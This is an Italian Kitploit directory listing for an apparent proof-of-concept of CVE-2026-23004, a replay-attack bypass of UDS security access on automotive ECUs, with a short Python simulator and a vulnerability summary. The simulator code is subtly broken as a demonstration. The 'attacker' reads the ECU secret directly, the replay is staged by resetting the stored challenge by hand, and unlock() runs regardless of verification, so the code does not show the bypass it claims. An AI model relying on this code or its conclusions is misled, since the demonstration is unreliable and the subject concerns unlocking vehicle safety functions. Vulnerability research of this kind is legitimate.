Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Exploit proof-of-concept che dimostra il bypass dell'autenticazione UDS tramite replay challenge-response su ECU automobilistiche, con simulatore CAN-UDS Python. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Autenticazione e AutorizzazioneSicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware e IoT
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Exploit proof-of-concept che dimostra il bypass dell'autenticazione UDS tramite replay challenge-response su ECU automobilistiche, con simulatore CAN-UDS Python.

Vedi Repository
114 giorni faNon ancora revisionato

CVE-2026-23004 – Bypass dell'autenticazione UDS automobilistico tramite attacco di replay

Codice del programma (simulatore Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Bypass dell'autenticazione UDS automobilistico tramite replay

Severity: High

Panoramica

Una centralina elettronica (ECU) automobilistica implementa l'accesso di sicurezza Unified Diagnostic Services (UDS) (servizio 0x27) ma non impone l'uso monouso della challenge. Un attaccante può catturare una coppia challenge‑response valida e riprodurla per bypassare l'autenticazione.

Dettagli della vulnerabilità

  • Tipo: Attacco di replay
  • Impatto: Programmazione non autorizzata della ECU, override delle funzioni di sicurezza.
  • Causa principale: La ECU accetta qualsiasi risposta che corrisponda alla challenge corrente, ma la stessa challenge può essere riutilizzata senza invalidazione.

Dimostrazione dell'exploit

Esegui la simulazione:

root@kitploit:~
python uds_sim.py

La ECU si sblocca due volte con la stessa coppia di autenticazione.

Scarica lo strumento